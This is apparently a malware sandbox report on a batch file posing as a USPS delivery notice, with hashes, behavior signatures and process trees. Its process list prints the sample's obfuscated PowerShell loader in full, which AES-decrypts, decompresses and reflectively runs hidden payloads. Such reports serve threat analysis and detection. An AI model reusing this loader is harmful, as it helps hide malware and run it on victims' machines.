Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
30s -
max time network
32s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
22/03/2023, 14:39
Static task
static1
Behavioral task
behavioral1
Sample
Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat
Resource
win7-20230220-en
General
-
Target
Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat
-
Size
235KB
-
MD5
fb5791ff7ad2148b8df7a4e351e46842
-
SHA1
55b68f7462e2c034ad3220b1096578c9a8697a34
-
SHA256
f590b5d9c60f27f88ee136632a4b34d037ff271dc55275b4cff859bd48eb06f2
-
SHA512
8f42f02f8c09c35f491b62ed30e26ae413c9a9c2e20d473bb8d8724f1446f95a62a1e91d77e7d0abfd0053f9fa26f2080bfbf9df5123f81f5768c543c9b8a790
-
SSDEEP
3072:oE7glwQ922cFBB5HM5cez7osBGlCipzFqVlk3tIexSnj+wVC1UbweKeWDZmTrr/M:nglwK22KBBIceQsBGysxxcgXZwrr5MZX
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1784 Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1784 Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1584 powershell.exe 1784 Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1584 powershell.exe Token: SeDebugPrivilege 1784 Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 904 wrote to memory of 1584 904 cmd.exe 28 PID 904 wrote to memory of 1584 904 cmd.exe 28 PID 904 wrote to memory of 1584 904 cmd.exe 28 PID 904 wrote to memory of 1784 904 cmd.exe 29 PID 904 wrote to memory of 1784 904 cmd.exe 29 PID 904 wrote to memory of 1784 904 cmd.exe 29 PID 904 wrote to memory of 1784 904 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe"C:\Users\Admin\AppData\Local\Temp\Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe" function Xy($b){$b.Replace('vSmGw', '')}$LLEF=Xy 'EnvSmGwtrvSmGwyvSmGwPovSmGwintvSmGw';$OrsV=Xy 'FromvSmGwBasevSmGw64vSmGwStvSmGwrivSmGwngvSmGw';$RFsr=Xy 'RevSmGwadvSmGwLinevSmGwsvSmGw';$QLig=Xy 'InvSmGwvokvSmGwevSmGw';$VRXb=Xy 'TranvSmGwsfovSmGwrvSmGwmFvSmGwivSmGwnalvSmGwBlvSmGwockvSmGw';$tKVa=Xy 'CvSmGwrvSmGwevSmGwatevSmGwDecrvSmGwypvSmGwtovSmGwrvSmGw';$CoSN=Xy 'LvSmGwovSmGwadvSmGw';$YJoi=Xy 'GvSmGwevSmGwtCvSmGwurrvSmGwenvSmGwtPvSmGwrvSmGwocevSmGwssvSmGw';$BTxw=Xy 'FvSmGwirstvSmGw';$tQgl=Xy 'ChvSmGwanvSmGwgvSmGweEvSmGwxvSmGwtevSmGwnsivSmGwonvSmGw';function MHOHE($oVxEr){$OpvpD=[System.Security.Cryptography.Aes]::Create();$OpvpD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OpvpD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OpvpD.Key=[System.Convert]::$OrsV('Z1w0C4VfFltAxFc5GtH6GgxG5WWF9jPI0I/rvgBH6DQ=');$OpvpD.IV=[System.Convert]::$OrsV('HnFST6ASK8sXXV+1L3SdHw==');$vcVSb=$OpvpD.$tKVa();$bhuUY=$vcVSb.$VRXb($oVxEr,0,$oVxEr.Length);$vcVSb.Dispose();$OpvpD.Dispose();$bhuUY;}function DwQRM($oVxEr){$mhOnd=New-Object System.IO.MemoryStream(,$oVxEr);$JLVWL=New-Object System.IO.MemoryStream;$mIqqp=New-Object System.IO.Compression.GZipStream($mhOnd,[IO.Compression.CompressionMode]::Decompress);$mIqqp.CopyTo($JLVWL);$mIqqp.Dispose();$mhOnd.Dispose();$JLVWL.Dispose();$JLVWL.ToArray();}function rgAct($oVxEr,$XYsts){[System.Reflection.Assembly]::$CoSN([byte[]]$oVxEr).$LLEF.$QLig($null,$XYsts);}$pEjBI=[System.Linq.Enumerable]::$BTxw([System.IO.File]::$RFsr([System.IO.Path]::$tQgl([System.Diagnostics.Process]::$YJoi().MainModule.FileName, $null)));$GLqbd = $pEjBI.Substring(3).Split('\');$dXjNK=DwQRM (MHOHE ([Convert]::$OrsV($GLqbd[0])));$EobPQ=DwQRM (MHOHE ([Convert]::$OrsV($GLqbd[1])));rgAct $EobPQ $null;rgAct $dXjNK $null;2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f